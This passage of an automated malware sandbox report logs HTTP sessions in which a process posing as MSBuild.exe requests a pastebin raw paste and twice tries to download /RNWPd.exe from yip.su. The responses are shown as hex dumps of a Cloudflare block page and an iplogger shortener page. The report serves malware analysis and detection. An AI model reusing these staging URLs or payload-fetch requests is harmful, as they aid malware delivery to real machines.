                    2024-09-16 19:20:34 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 34 70 78 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 63 68 61 6c 6c 65 6e 67 65 2d 63 6f 6e 74 65 6e 74 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 20 61 7b 63
                    Data Ascii: allenge-error-text{background-position:100%;padding-left:0;padding-right:34px}.challenge-content .spacer{margin:2rem 0}.challenge-content .loading-spinner{height:76.391px}@media (prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body a{c
                    2024-09-16 19:20:34 UTC1369INData Raw: 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e
                    Data Ascii: S4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}}</style><meta http-equiv="refresh" conten
                    2024-09-16 19:20:34 UTC1369INData Raw: 66 55 72 73 79 4a 37 74 33 64 53 57 6c 7a 4c 42 77 31 58 4e 6e 58 70 56 67 53 6c 51 77 6c 30 59 49 6c 79 69 7a 6a 75 76 6f 48 4d 6b 34 50 38 57 4a 34 46 61 73 5a 66 2e 69 71 5a 36 4d 45 30 35 59 52 59 36 51 64 45 68 71 44 55 54 6f 43 73 7a 6d 4c 31 4e 39 33 4f 32 69 46 70 58 32 48 65 63 79 65 64 49 41 52 49 6a 4a 4d 63 5a 30 2e 6e 67 55 62 48 68 5f 5f 55 58 69 54 57 77 48 47 47 73 42 37 62 31 52 32 4c 58 6e 72 59 67 79 47 53 4f 4f 69 53 5f 30 39 35 6e 42 32 51 48 55 77 38 78 7a 4d 65 4e 76 79 35 64 6b 39 61 65 53 71 32 67 57 63 51 61 4e 56 4d 49 6b 33 5f 47 50 33 5a 51 6c 54 37 78 78 6f 73 47 43 4e 67 33 37 30 61 7a 33 4a 5a 70 7a 7a 64 47 58 76 66 35 64 62 50 45 67 32 49 6e 46 46 69 6c 73 30 68 43 56 55 53 37 47 4a 6f 2e 53 30 50 71 50 2e 65 65 42 42 70
                    Data Ascii: fUrsyJ7t3dSWlzLBw1XNnXpVgSlQwl0YIlyizjuvoHMk4P8WJ4FasZf.iqZ6ME05YRY6QdEhqDUToCszmL1N93O2iFpX2HecyedIARIjJMcZ0.ngUbHh__UXiTWwHGGsB7b1R2LXnrYgyGSOOiS_095nB2QHUw8xzMeNvy5dk9aeSq2gWcQaNVMIk3_GP3ZQlT7xxosGCNg370az3JZpzzdGXvf5dbPEg2InFFils0hCVUS7GJo.S0PqP.eeBBp


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.649733104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:34 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:20:34 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c4336f1bf6e2369-EWR
                    2024-09-16 19:20:34 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:20:34 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:20:34 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:20:34 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:20:34 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.649734188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:35 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:20:36 UTC908INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:20:36 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:20:36 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eX7oEAi4a%2BHQd%2BM5aIWlAziNpW%2BH%2BVIfP%2FDkd8Pqm%2BYaYO5c6wUU4BlP2StjYvZDWnPS%2F5YlpdjT3cdiZSGKI78lRz27l5ulj4yMdfurdEv3sdBdic7opno%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4336f8aa054407-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:20:36 UTC461INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:20:36 UTC1369INData Raw: 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61
                    Data Ascii: visit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta
                    2024-09-16 19:20:36 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f
                    Data Ascii: kground-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animatio
                    2024-09-16 19:20:36 UTC1369INData Raw: 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78
                    Data Ascii: ator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.index
                    2024-09-16 19:20:36 UTC1369INData Raw: 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f
                    Data Ascii: ript><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto
                    2024-09-16 19:20:36 UTC1369INData Raw: 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c
                    Data Ascii: ght:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><
                    2024-09-16 19:20:36 UTC164INData Raw: 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: )),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:20:36 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.649738188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:11 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:21:11 UTC893INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.42901611328125
                    expires: Mon, 16 Sep 2024 19:21:11 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:21:11 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=08GaDA7QGlLLPZoOaMabFDEyYwjQTiXHlHANI1D5BaLJ08vPLK9aVIkkGHlW0kWwzwQzfL2ZyvKuyk1u07s1qh42ftRgOg2NzBmpwKf%2B7MfmT1zVSUJLp7w%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4337d8abe95e64-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:21:11 UTC476INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:21:11 UTC1369INData Raw: 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69
                    Data Ascii: ntent="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="og:i
                    2024-09-16 19:21:11 UTC1369INData Raw: 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 34 73 3b 61 6e
                    Data Ascii: 338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.4s;an
